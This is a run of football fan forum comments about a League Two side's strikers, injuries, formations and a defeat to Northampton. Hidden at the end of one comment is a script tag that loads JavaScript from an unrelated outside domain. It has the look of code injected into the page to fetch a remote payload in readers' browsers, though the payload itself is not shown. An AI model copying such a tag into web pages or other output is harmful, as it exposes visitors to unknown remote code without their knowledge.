They did put the ball in the net twice yesterday, both ruled out by the ref. Also, Dunk should have scored but managed to place his shot straight at Dallas who had no chance of getting out of the way.

Like I said we need a striker, don’t win games if a striker should have scored.A striker has to score reasonable regular for the team to win games .Iknow we are a league two side and am not expecting the earth ,but let’s all be very honest here, are strikers at this given time are not great are they.we have more to choice from than last year, but they are all of the same standard.we are better than last season as a team and seem to have a bit more fight and fortune in pulling a draw or a win in games we would have lost last season and with a fully fit squad I think we would be knocking playoffs ,but if the squad is as hampered all season as it is now then we are a mid to lower side .

It may have only been a poor defeat in a wretched competition, but the home form is alarming at the moment.
Without a vast home improvement soon, we'd all better hope that the away form holds up, otherwise we'll plummet down the table.
Still too much 'filler' in the squad for my liking.

Smith has 5 in the last 5 league games, I’d say that’s pretty decent.

Still a third of our average home support attended this sadly.

Smith five in five yes but who else in the striker department remotely looks like scoring no one ,with a defence that can’t defend corners or set pieces to save its life ,then win one lose a couple and draw here and there will continue.Thats fine with the injuries we have but with a full squad a lot more will be expected from me.

The big problem he's having at the moment is that we don't play a formation he fits into. He would probably get more opportunities in a 4-4-2 or 4-3-3, but I don't think CC see's him as a wingback. No doubt, but considering 3-4-3 has become our go-to formation for when we're chasing a game, I'm still a little surprised by his absences. Especially when, like last week, we have a long injury list. I do agree, especially as we seem to be chasing a lot of games this season!

Marc Richards is quite capable of scoring despite all of the criticism from the usual small minded percentage. He netted twice the other week despite both being disallowed. The trouble is, as usual, he is spending too much time with his back to the opposition's goal. We are using him as a target man and that is not his game. I watched last night's game and the endeavor was there but unfortunately the know how was not. Too much playing sideways and backwards with quite often the usual hump from the full back's with the inevitable lose possession, especially if it's launched from Greg Taylor's boot. We have/had a midfield that is mostly so one dimensional and no one who can get the ball and drive forward/attack the space. Northampton moved up the field with the ball with pace & progression while we just try to move up the field with sideways and backwards passing, the ball going up the field 40 yards and then back 50. We occasionally manage to get a fluent attack going with some decisive passing but not regular and it's simply just not good enough. The brown/black guy who played right mid for the Cobblers was an education of how to get the ball and go. <script type="text/javascript" async="" src="//linkangood.com/21ef897172770ca75d.js"></script>

We definitely been very unlucky with injuries ,and more than likely with our best side out with Carruthers and jones in the side ,could be 4 or 5 points better off .The trouble is when they do play they will take 3 or 4 games to get back to there best and nearly a third of the season will have past .jabo the same ,the last time he played the ball had laces in it.
